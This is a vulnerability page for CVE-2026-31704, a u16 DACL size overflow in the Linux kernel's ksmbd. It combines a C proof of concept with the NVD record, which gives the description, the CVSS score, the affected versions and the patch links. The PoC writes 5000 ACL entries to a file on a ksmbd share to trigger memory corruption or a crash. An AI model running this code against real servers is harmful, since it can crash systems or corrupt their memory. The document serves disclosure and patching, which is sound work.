CVE-2026-31704

#include <sys/acl.h> #include <stdio.h> #include <stdlib.h> // Conceptual Proof of Concept for CVE-2026-31704 // This PoC attempts to trigger the u16 overflow in ksmbd by setting // a large number of POSIX ACL entries on a file. int main() { const char *file_path = "/mnt/ksmbd_share/target_file"; // Create a file if it doesn't exist FILE *f = fopen(file_path, "w"); if (f) fclose(f); // Initialize ACL with a large number of entries // Aiming for total size > 65535 bytes (u16 max) // Each entry is approx 12-24 bytes. 5000 entries should be sufficient. acl_t acl = acl_init(5000); if (!acl) { perror("acl_init failed"); return 1; } printf("[+] Adding ACL entries to trigger overflow...\n"); for (int i = 0; i < 5000; i++) { acl_entry_t entry; acl_permset_t permset; if (acl_create_entry(&acl, &entry) == -1) { perror("acl_create_entry failed"); break; } acl_get_permset(entry, &permset); acl_add_perm(permset, ACL_READ); acl_set_permset(entry, &permset); // Set a dummy tag (e.g., USER) acl_set_tag_type(entry, ACL_USER); } // Apply the ACL to the file via the ksmbd interface if (acl_set_file(file_path, ACL_TYPE_ACCESS, acl) == -1) { perror("[!] Failed to set ACL (Kernel might be patched or limit enforced)"); } else { printf("[+] ACL set successfully. Check kernel logs for memory corruption or crash.\n"); } acl_free(acl); return 0; }

{"cve": {"id": "CVE-2026-31704", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-01T14:16:20.367", "lastModified": "2026-05-06T20:46:54.840", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: use check_add_overflow() to prevent u16 DACL size overflow\n\nset_posix_acl_entries_dacl() and set_ntacl_dacl() accumulate ACE sizes\nin u16 variables. When a file has many POSIX ACL entries, the\naccumulated size can wrap past 65535, causing the pointer arithmetic\n(char *)pndace + *size to land within already-written ACEs. Subsequent\nwrites then overwrite earlier entries, and pndacl->size gets a\ntruncated value.\n\nUse check_add_overflow() at each accumulation point to detect the\nwrap before it corrupts the buffer, consistent with existing\ncheck_mul_overflow() usage elsewhere in smbacl.c."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.15", "versionEndExcluding": "6.6.136", "matchCriteriaId": "B1ABA9F0-A5C4-4CBE-92EC-33CA7D4F7634"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.84", "matchCriteriaId": "D4ECA0DE-AFF5-4688-B219-4CA2336CA5B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.25", "matchCriteriaId": "8B0A7E0E-F6D8-45DB-8CD9-01839FE40A6C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "7.0.2", "matchCriteriaId": "1BD58F1E-7C20-4C0D-92A2-FAC5CBFBE8A8"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/299f962c0b02d048fb45d248b4da493d03f3175d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5e7b8f3c539d69b2ed5f2408e2f75e68ce7eef43", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8d5729350b236896f51379588d9a690b7fafb8db", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e1955a94b6f17f4b058afa955a6f187eb3ed7615", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ef7902be3f215b6bf7babe4dc9dd9a7d57dad7a7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}